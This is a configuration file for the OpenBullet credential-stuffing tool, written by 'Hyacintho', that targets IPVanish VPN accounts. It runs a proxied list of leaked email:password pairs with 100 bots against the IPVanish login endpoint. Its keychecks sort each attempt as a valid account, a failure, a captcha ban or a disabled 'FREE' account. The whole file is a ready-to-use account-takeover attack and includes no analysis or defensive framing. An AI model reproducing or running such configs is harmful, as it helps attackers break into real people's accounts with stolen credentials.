[SETTINGS]
{
  "Name": "IPVanish",
  "SuggestedBots": 100,
  "LastModified": "2019-05-02T10:47:17.8747066+02:00",
  "AdditionalInfo": "by Hyacintho",
  "Author": "Hyacintho",
  "Version": "1.2.3.2 [Paradox Mod]",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Login REQUEST POST "https://account.ipvanish.com/login/validate" 
  CONTENT "username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://account.ipvanish.com" 
  HEADER "referer: https://account.ipvanish.com/login" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "your account credentials are invalid" 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "your account credentials are invalid" 
  KEYCHAIN Ban OR 
    KEY "We were unable to validate the captcha" 

KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "Your service has been temporarily disabled" 

